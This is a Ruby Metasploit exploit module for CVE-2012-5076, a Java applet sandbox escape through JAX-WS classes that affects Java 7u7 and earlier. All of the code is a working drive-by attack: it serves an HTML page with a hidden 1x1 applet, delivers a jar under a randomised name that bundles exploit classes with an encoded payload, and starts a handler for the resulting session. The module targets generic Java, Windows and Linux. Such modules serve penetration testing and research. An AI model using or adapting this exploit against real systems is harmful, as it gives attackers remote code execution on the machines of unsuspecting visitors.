##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
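class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({ :javascript => false })

  # Class files shipped with the framework under
  # data/exploits/cve-2012-5076 and packaged into the served jar.
  # Each entry is the path split into segments, so nested package
  # directories can be expressed as additional segments.
  PAYLOAD_CLASSES = [
    %w[Exploit.class],
    %w[MyPayload.class]
  ].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet JAX-WS Remote Code Execution',
        'Description' => %q{
          This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
          code outside of the sandbox as exploited in the wild in November of 2012. The
          vulnerability affects Java version 7u7 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Vulnerability Discovery
          'juan vazquez' # metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-5076' ],
          [ 'OSVDB', '86363' ],
          [ 'BID', '56054' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx' ]
        ],
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [
            'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA
            }
          ],
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [
            'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-10-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # HTTP request dispatcher for the module's resource.
  #
  # Requests ending in ".jar" receive the packaged applet jar and start the
  # payload handler; any other request gets the applet landing page. A
  # landing-page request without a trailing slash is redirected first so
  # that the applet's relative +archive+ URL resolves under this resource.
  #
  # @param cli [Rex::Proto::Http::ServerClient] connected client
  # @param request [Rex::Proto::Http::Request] parsed request
  def on_request_uri(cli, request)
    unless request.uri.match?(/\.jar$/i)
      unless request.uri.match?(%r{/$})
        send_redirect(cli, get_resource + '/', '')
        return
      end

      print_status("#{name} handling request")
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
      return
    end

    # Build before announcing, so a packaging failure is reported before
    # the "Sending" line rather than after it.
    jar = build_jar(cli)

    print_status('Sending Applet.jar')
    send_response(cli, jar.pack, { 'Content-Type' => 'application/octet-stream' })

    handler(cli)
  end

  # Landing page: a minimal document that loads the jar through a 1x1 applet.
  # The jar name is randomised per request so the fetched archive does not
  # have a stable filename.
  #
  # @return [String] HTML document
  def generate_html
    jar_name = "#{rand_text_alpha(rand(3..8))}.jar"

    '<html><head></head>' \
      '<body>' \
      "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">" \
      '</applet></body></html>'
  end

  private

  # Package the encoded payload jar together with the bundled class files.
  #
  # @param cli [Rex::Proto::Http::ServerClient] client the payload is generated for
  # @return [Rex::Zip::Jar] jar ready to be +pack+ed
  def build_jar(cli)
    jar = regenerate_payload(cli).encoded_jar

    PAYLOAD_CLASSES.each do |path|
      add_directory_entries(jar, path)

      # File.binread opens, reads in binary mode and closes in one step, so
      # the descriptor cannot leak if the read raises (the open/read/close
      # sequence it replaces had no ensure).
      data = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5076', path))
      jar.add_file(path.join('/'), data)
    end

    jar
  end

  # Ensure every intermediate directory entry of +path+ exists in +jar+.
  # With the single-segment paths in PAYLOAD_CLASSES this is a no-op; it
  # only matters for a class that lives inside a package directory.
  #
  # @param jar [Rex::Zip::Jar] jar being assembled
  # @param path [Array<String>] path segments of the class file
  def add_directory_entries(jar, path)
    existing = jar.entries.map(&:name)

    1.upto(path.length - 1) do |idx|
      dir = path[0, idx].join('/') + '/'
      next if existing.include?(dir)

      jar.add_file(dir, '')
      existing << dir
    end
  end
end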